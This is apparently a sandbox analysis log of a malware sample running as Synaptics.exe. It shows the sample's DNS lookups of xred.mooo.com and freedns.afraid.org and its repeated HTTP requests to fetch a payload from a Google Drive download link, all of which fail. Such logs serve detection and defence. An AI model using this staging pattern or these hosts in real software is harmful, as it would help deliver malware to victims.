                                                                                                        Dec 30, 2024 11:49:09.321660042 CET1.1.1.1192.168.2.90x4a8cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:09.321660042 CET1.1.1.1192.168.2.90x4a8cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:17.810094118 CET1.1.1.1192.168.2.90x5ab4No error (0)docs.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.672677994 CET1.1.1.1192.168.2.90x284aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.682621956 CET1.1.1.1192.168.2.90x8fe8No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.863430977 CET1.1.1.1192.168.2.90xb3e6No error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:50:21.531029940 CET1.1.1.1192.168.2.90x9825No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:50:21.531029940 CET1.1.1.1192.168.2.90x9825No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • docs.google.com
                                                                                                        • drive.usercontent.google.com
                                                                                                        • freedns.afraid.org

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.94977069.42.215.252801360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 30, 2024 11:49:18.688421965 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                        User-Agent: MyApp
                                                                                                        Host: freedns.afraid.org
                                                                                                        Cache-Control: no-cache
                                                                                                        Dec 30, 2024 11:49:19.278332949 CET243INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Cache: MISS
                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.949762142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:18 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:18 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-aHZw2-8Ul8ImyAur4eVzaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        1192.168.2.949761142.250.186.78443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:18 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:18 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-i7gCimGQFXGGjv24YdPTyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.949771142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B7VtcYji7D9wt0FJD15Hcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.949772142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:19 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:20 UTC1601INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6ESPAnwcEORxv5p8CaLRmq2JSfZSC5hVBsHa5VCfAxhQX4g_w9awq9Vk4aWnkJyui-I3bvJhk
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qtThlVbzU-ZOr8HMLo0ehw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=qV6rTPWO8kpOHQ3mFtatW_ZseHmoLbgRYSqKkPwUEswZ4Y_LTJwPQr25o9sVjHpeGD0VKTZCD8drPB2qk5P5Ab0M0pvX0_ZvnIAdmjC7_UDvYU4yDVCjXtG5slbudraDZ_YhuVNtqq2CXG95knkGbXPKUsCWT9bmPblH5P3k3YIOIUfHgy-nnqU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:20 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 35 50 4c 65 4d 6c 69 7a 38 75 42 61 43 58 64 63 6b 62 46 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T5PLeMliz8uBaCXdckbFBw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:20 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.949774142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LNswrX5Dlev9_qdN1jNpvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.949773142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:19 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:20 UTC1594INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6rDPlt-SAHHumlIj5byG2IKf-jgpwLBwl0unZTFwbt5VUNBIlhDHyJVQSGZT4XVH1j
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TUYv8N5SmqvDCGP0Kra8dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:20 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 70 68 4c 7a 75 58 5a 7a 65 32 63 37 47 52 74 4a 47 4c 5f 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fphLzuXZze2c7GRtJGL_Ng">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:20 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.949785142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:20 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-X5UhV6BTCZg1LHuqsrqIlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.949787142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:20 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Cp9MHh6l2Ck6WQcy0fQqaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.949788142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:20 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:21 UTC1594INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC7zIzCrrM_LMVkk8dm062WGmC-SjW9ndIMFOZ5dn7_WUSR_fjO2G4nfX3HtcWPWbmY2
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6wa03LzFRxw5PAugiy2OXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
